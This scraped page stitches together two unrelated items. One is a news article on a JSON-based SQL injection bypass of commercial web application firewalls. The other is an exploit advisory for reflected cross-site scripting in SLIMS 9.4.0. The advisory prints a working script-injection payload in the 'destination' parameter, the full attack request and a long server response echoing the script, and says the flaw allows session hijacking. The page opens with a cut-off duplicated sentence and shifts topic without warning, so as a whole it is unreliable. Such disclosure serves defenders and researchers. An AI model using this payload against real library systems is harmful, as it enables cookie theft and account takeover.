Web application firewalls are a key line of defense to help filter, monitor, and block HTTP(S) traffic to and from a web application, and safeguard against attacks such as cross-site

Web App Firewall / Web Security

A new attack method can be used to circumvent web application firewalls (WAFs) of various vendors and infiltrate systems, potentially enabling attackers to gain access to sensitive business and customer information.

Web application firewalls are a key line of defense to help filter, monitor, and block HTTP(S) traffic to and from a web application, and safeguard against attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection.

The generic bypass "involves appending JSON syntax to SQL injection payloads that a WAF is unable to parse," Claroty researcher Noam Moshe said. "Most WAFs will easily detect SQLi attacks, but prepending JSON to SQL syntax left the WAF blind to these attacks."

The industrial and IoT cybersecurity company said its technique successfully worked against WAFs from vendors like Amazon Web Services (AWS), Cloudflare, F5, Imperva, and Palo Alto Networks, all of whom have since released updates to support JSON syntax during SQL injection inspection.

With WAFs acting as a security guardrail against malicious external HTTP(S) traffic, an attacker with capabilities to get past the barrier can obtain initial access to a target environment for further post-exploitation.

The bypass mechanism devised by Claroty banks on the lack of JSON support for WAFs to craft rogue SQL injection payloads that include JSON syntax to skirt the protections.

"Attackers using this novel technique could access a backend database and use additional vulnerabilities and exploits to exfiltrate information via either direct access to the server or over the cloud," Moshe explained. "This is a dangerous bypass, especially as more organizations continue to migrate more business and functionality to the cloud."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Detail New Attack Method to Bypass Popular Web Application Firewalls

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Tag

#js